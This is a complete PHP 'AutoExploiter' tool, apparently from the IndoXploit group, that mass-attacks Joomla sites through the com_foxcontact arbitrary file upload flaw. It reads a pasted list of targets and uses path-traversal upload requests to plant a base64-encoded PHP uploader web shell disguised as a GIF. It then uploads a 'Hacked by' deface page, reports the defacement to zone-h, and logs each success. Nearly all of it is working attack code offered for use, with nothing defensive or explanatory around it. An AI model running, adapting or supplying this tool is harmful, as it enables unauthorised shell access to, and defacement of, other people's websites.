AutoExploiter Com_Foxcontact

1. <head><title>Com_FoxContact AutoExploiter ~</title></head>
2. <link href='https://fonts.googleapis.com/css?family=Ubuntu' rel='stylesheet' type='text/css'>
3. <style type="text/css">
4.  body { background:black;font-family: Ubuntu ; color:#fff; padding:50px}
5. .text {width:600px;height:200px;font-family: Ubuntu ; border: 1px solid darkred; }
6. .btn {background:#b70505;color:white;border: 1px solid #000; padding:6px 6px 6px 6px;font-family: Ubuntu ;}
7. .btn:hover {background:#c0bfbf;color:#000000; font-family: Ubuntu ; }
8. </style>
9. <center> <font new size="5">Com_FoxContact AutoExploiter ~</font><br>
10. <form action="" method="POST">
11. <textarea class="text" name="sites"></textarea>
12. <br>
13. <input class="btn" type="submit" value="Exploit" name="die">
14. </form>
15. </center>
16. <?php
17. /**
18.  
19. Joomla Component com_foxcontact Arbitrary File Upload
20. https://cxsecurity.com/issue/WLB-2016050072
21.  
22. Web based By UstadCage_48
23.  
24. Auto Exploiter (Shell Upload, Auto Deface, and Auto Submit Zone -H)
25. Coded by: L0c4lh34rtz - IndoXploit
26. http://www.indoxploit.or.id/2017/12/joomla-component-comfoxcontact.html
27.  
28. */
29.  
30. error_reporting(0);
31. set_time_limit(0);
32.  
33. Class IDX_Foxcontact {
34.     public  $url;
35.     private $file = [];
36.  
37.     /* Nick Hacker Kalian / Nick Zone -H Kalian */
38.     /* Pastikan dalam script deface kalian terdapat kata HACKED */
39.     private $hacker = "USTADCAGE_48";
40.  
41.     /* script uploader, sebaiknya jangan di otak-atik */
42.     private $uploader  = 'R0lGODlhOw0KPGh0bWw+DQo8dGl0bGU+VXBsb2FkZXIgQnkgSW5kb1hwbG9pdCBCT1Q8L3RpdGxlPg0KPHA+PD9waHAgZWNobyAnPGI+Jy5waHBfdW5hbWUoKS4nPC9iPic7ID8+PGJyPg0KPD9waHAgZWNobyAnPGI+Jy5nZXRjd2QoKS4nPC9iPic7ID8+PC9wPg0KPGZvcm0gbWV0aG9kPSdwb3N0JyBlbmN0eXBlPSdtdWx0aXBhcnQvZm9ybS1kYXRhJz4NCjxpbnB1dCB0eXBlPSdmaWxlJyBuYW1lPSdpZHhfZmlsZSc+DQo8aW5wdXQgdHlwZT0nc3VibWl0JyB2YWx1ZT0ndXBsb2FkJyBuYW1lPSd1cGxvYWQnPg0KPC9mb3JtPg0KPD9waHAgaWYoaXNzZXQoJF9QT1NUWyd1cGxvYWQnXSkpIHsgaWYoQGNvcHkoJF9GSUxFU1snaWR4X2ZpbGUnXVsndG1wX25hbWUnXSwgJF9GSUxFU1snaWR4X2ZpbGUnXVsnbmFtZSddKSkgeyBlY2hvJF9GSUxFU1snaWR4X2ZpbGUnXVsnbmFtZSddLiAnWzxiPk9LPC9iPl0nOyB9IGVsc2UgeyBlY2hvJF9GSUxFU1snaWR4X2ZpbGUnXVsnbmFtZSddLiAnWzxiPkZBSUxFRDwvYj4nOyB9IH0gPz4=';
43.        
44.     /* script deface, ubah bagian ini ke base64 script deface kalian */
45.     private $deface    = 'DQo8IS0tDQphZG1pbkBpbmRveHBsb2l0Lm9yLmlkDQoNCiNQYXRjaCBZb3VyIFN5c3RlbQ0KLS0+DQo8IURPQ1RZUEUgSFRNTD4NCjxodG1sPg0KPGhlYWQ+DQo8dGl0bGU+SGFja2VkIGJ5IEwwYzRsaDM0cnR6fjwvdGl0bGU+DQo8bWV0YSBjaGFyc2V0PSJVVEYtOCI+DQo8bWV0YSBuYW1lPSJhdXRob3IiIGNvbnRlbnQ9IkwwYzRsaDM0cnR6ICNJbmRvWHBsb2l0ICNTYW5qdW5nYW5KaXdhIj4NCjxtZXRhIG5hbWU9ImtleXdvcmRzIiBjb250ZW50PSJJbmRvWHBsb2l0LCBTYW5qdW5nYW4gSml3YSwgSGFja2VkIGJ5IEluZG9YcGxvaXQsIEhhY2tlZCBieSBMMGM0bGgzNHJ0eiI+DQo8bWV0YSBwcm9wZXJ0eT0ib2c6a2V5d29yZHMiIGNvbnRlbnQ9IkluZG9YcGxvaXQsIFNhbmp1bmdhbiBKaXdhLCBIYWNrZWQgYnkgSW5kb1hwbG9pdCwgSGFja2VkIGJ5IEwwYzRsaDM0cnR6Ij4NCjxtZXRhIG5hbWU9ImRlc2NyaXB0aW9uIiBjb250ZW50PSJIYWNrZWQgYnkgTDBjNGxoMzRydHogfCBJbmRvWHBsb2l0IC0gU2FuanVuZ2FuIEppd2EiPg0KPG1ldGEgcHJvcGVydHk9Im9nOmRlc2NyaXB0aW9uIiBjb250ZW50PSJIYWNrZWQgYnkgTDBjNGxoMzRydHogfCBJbmRvWHBsb2l0IC0gU2FuanVuZ2FuIEppd2EiPg0KPGxpbmsgcmVsPSJzaG9ydGN1dCBpY29uIiBocmVmPSJodHRwOi8vZmxhLmZnLWEuY29tL2ZsYWdzL2luZG9uZXNpYS1mbGFnLWJ1dHRvbi0yLnBuZyI+DQo8c3R5bGU+DQpoMSB7DQoJbWFyZ2luLXRvcDogNGVtOw0KCWZvbnQtZmFtaWx5OiBtb25vc3BhY2U7DQoJZm9udC1zaXplOiA0NXB4Ow0KfQ0KDQpib2R5IHsgDQoJYmFja2dyb3VuZDogYmxhY2s7IA0KCXRleHQtYWxpZ246IGNlbnRlcjsgDQoJdGV4dC1zaGFkb3c6IDFweCAxcHggIzE3YTI0ZjsgDQoJZm9udC1mYW1pbHk6Q291cmllciBOZXc7IA0KCWNvbG9yOiB3aGl0ZTsgDQp9IA0KPC9zdHlsZT4NCjwvaGVhZD4NCjxib2R5Pg0KPGgxPkhhY2tlZCBieSBMMGM0bGgzNHJ0ejwvaDE+DQo8cD48Zm9udCBzaXplPSIyIj4jPG1hcnF1ZWUgYmVoYXZpb3I9ImFsdGVybmF0ZSIgc2Nyb2xsYW1vdW50PSI0IiB3aWR0aD0iNDAlIj5JbmRvWHBsb2l0IC0gU2FuanVuZ2FuIEppd2EgLSBEZXBvayBDeWJlciBTZWN1cml0eSA8L21hcnF1ZWU+IzwvZm9udD48L3A+DQo8aWZyYW1lIHNyYz0iaHR0cDovL3d3dy55b3V0dWJlLmNvbS9lbWJlZC9Fem14N21VNnF0Zz9yZWw9MCZhbXA7YXV0b3BsYXk9MSZhbXA7bG9vcD0xJmFtcDtwbGF5bGlzdD1Fem14N21VNnF0ZyIgZnJhbWVib3JkZXI9IjAiIGhlaWdodD0iMSIgd2lkdGg9IjEiPjwvaWZyYW1lPg0KPC9ib2R5Pg0KPC9odG1sPg0KPG5vc2NyaXB0Pg0KPCEtLQ==';
46.  
47.          
48.  
49.     public function __construct() {
50.         $this->file = (object) $this->file;
51.  
52.         /* Nama file deface kalian */
53.         $this->file->deface     = "48.htm";
54.  
55.         $this->file->shell      = $this->randomFileName().".php";
56.     }
57.  
58.     public function validUrl() {
59.         if(!preg_match("/^http:\/\//", $this->url) AND !preg_match("/^https:\/\//", $this->url)) {
60.             $url = "http://".$this->url;
61.             return $url;
62.         } else {
63.             return $this->url;
64.         }
65.     }
66.  
67.     public function randomFileName() {
68.         $characters = implode("", range(0,9)).implode("", range("A","Z")).implode("", range("a","z"));
69.         $generate   = substr(str_shuffle($characters), 0, rand(4, 8));
70.  
71.         $prefixFilename = "\x69\x6e\x64\x6f\x78\x70\x6c\x6f\x69\x74"."_";
72.         return $prefixFilename.$generate;
73.     }
74.  
75.     public function curl($url, $data = null, $headers = null, $cookie = true) {
76.         $ch = curl_init();
77.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
78.               curl_setopt($ch, CURLOPT_URL, $url);
79.               curl_setopt($ch, CURLOPT_USERAGENT, "IndoXploitTools/1.1");
80.               //curl_setopt($ch, CURLOPT_VERBOSE, TRUE);
81.               curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
82.               curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
83.               curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
84.               curl_setopt($ch, CURLOPT_TIMEOUT, 5);
85.  
86.         if($data !== null) {
87.               curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST");
88.               curl_setopt($ch, CURLOPT_POST, TRUE);
89.               curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
90.         }
91.  
92.         if($headers !== null) {
93.               curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
94.         }
95.  
96.         if($cookie === true) {
97.               curl_setopt($ch, CURLOPT_COOKIE, TRUE);
98.               curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt");
99.               curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.txt");
100.         }
101.  
102.         $exec = curl_exec($ch);
103.         $info = curl_getinfo($ch);
104.  
105.               curl_close($ch);
106.  
107.         return (object) [
108.             "response"  => $exec,
109.             "info"      => $info
110.         ];
111.  
112.     }
113.  
114.     public function getId() {
115.         $url        = $this->url;
116.         $getContent = $this->curl($url)->response;
117.         preg_match_all("/<a name=\"cid_(.*?)\">/", $getContent, $cid);
118.         preg_match_all("/<a name=\"mid_(.*?)\">/", $getContent, $mid);
119.  
120.         return (object) [
121.             "cid" => ($cid[1][0] === NULL ? 0 : $cid[1][0]),
122.             "mid" => ($mid[1][0] === NULL ? 0 : $mid[1][0]),
123.         ];
124.     }
125.  
126.     public function exploit() {
127.         $getCid = $this->getId()->cid;
128.         $getMid = $this->getId()->mid;
129.  
130.         $url    = (object) parse_url($this->url);
131.  
132.         $headers = [
133.             "X-Requested-With: XMLHttpRequest",
134.             "X-File-Name: ".$this->file->shell,
135.             "Content-Type: image/jpeg"
136.         ];
137.  
138.         $vuln   = [
139.             $url->scheme."://".$url->host."/components/com_foxcontact/lib/file-uploader.php?cid=".$getCid."&mid=".$getMid."&qqfile=/../../".$this->file->shell,
140.             $url->scheme."://".$url->host."/index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id=".$getCid."?cid=".$getCid."&mid=".$getMid."&qqfile=/../../".$this->file->shell,
141.             $url->scheme."://".$url->host."/index.php?option=com_foxcontact&view=loader&type=uploader&owner=module&id=".$getCid."?cid=".$getCid."&mid=".$getMid."&qqfile=/../../".$this->file->shell,
142.             $url->scheme."://".$url->host."/components/com_foxcontact/lib/uploader.php?cid=".$getCid."&mid=".$getMid."&qqfile=/../../".$this->file->shell,
143.         ];
144.  
145.         foreach($vuln as $v) {
146.             $this->curl($v, base64_decode($this->uploader), $headers);
147.         }
148.  
149.         $shell = $url->scheme."://".$url->host."/components/com_foxcontact/".$this->file->shell;
150.         $check = $this->curl($shell)->response;
151.         if(preg_match("/Uploader By IndoXploit BOT/i", $check)) {
152.             print "# Shell : ".$shell." <font color=green>[OK]</font><br>";
153.             $this->save($shell);
154.         } else {
155.             print "# Shell <font color=red>Failed</font><br>";
156.         }
157.        
158.         $vuln   = [
159.             $url->scheme."://".$url->host."/components/com_foxcontact/lib/file-uploader.php?cid=".$getCid."&mid=".$getMid."&qqfile=/../../../../".$this->file->deface,
160.             $url->scheme."://".$url->host."/index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id=".$getCid."?cid=".$getCid."&mid=".$getMid."&qqfile=/../../../../".$this->file->deface,
161.             $url->scheme."://".$url->host."/index.php?option=com_foxcontact&view=loader&type=uploader&owner=module&id=".$getCid."?cid=".$getCid."&mid=".$getMid."&qqfile=/../../../../".$this->file->deface,
162.             $url->scheme."://".$url->host."/components/com_foxcontact/lib/uploader.php?cid=".$getCid."&mid=".$getMid."&qqfile=/../../../../".$this->file->deface,
163.         ];
164.  
165.         foreach($vuln as $v) {
166.             $this->curl($v, base64_decode($this->deface), $headers);
167.         }
168.  
169.         $deface = $url->scheme."://".$url->host."/".$this->file->deface;
170.         $check = $this->curl($deface)->response;
171.         if(preg_match("/hacked/i", $check)) {
172.             print "# Deface : ".$deface." <font color=green>[OK]</font><br>";
173.             $this->zoneh($deface);
174.             $this->save($deface);
175.         } else {
176.             print "# Deface <font color=red>Failed</font><br><br>";
177.         }
178.     }
179.  
180.     public function zoneh($url) {
181.         $post = $this->curl("http://www.zone-h.com/notify/single", "defacer=".$this->hacker."&domain1=$url&hackmode=1&reason=1&submit=Send",null,false);
182.         if(preg_match("/color=\"red\">(.*?)<\/font><\/li>/i", $post->response, $matches)) {
183.             if($matches[1] === "ERROR") {
184.                 preg_match("/<font color=\"red\">ERROR:<br\/>(.*?)<br\/>/i", $post->response, $matches2);
185.                 print "# Zone-H ($url) <font color=red>[ERROR]</font><br><br>";
186.             } else {
187.                 print "# Zone-H ($url) <font color=green>[OK]</font><br><br>";
188.             }
189.         }
190.     }
191.  
192.     public function save($isi) {
193.         $handle = fopen("result_foxcontact.txt", "a+");
194.         fwrite($handle, "$isi<br>");
195.         fclose($handle);
196.     }
197. }  
198.  
199. if($_POST['die']){
200. $open = explode("\n",$_POST['sites']);
201.  
202. foreach($open as $list) {
203.     $fox = new IDX_Foxcontact();
204.     $fox->url = trim($list);
205.     $fox->url = $fox->validUrl();
206.  
207.     print "# Exploiting ".parse_url($fox->url, PHP_URL_HOST)."<br>";
208.     $fox->exploit();
209. }
210. }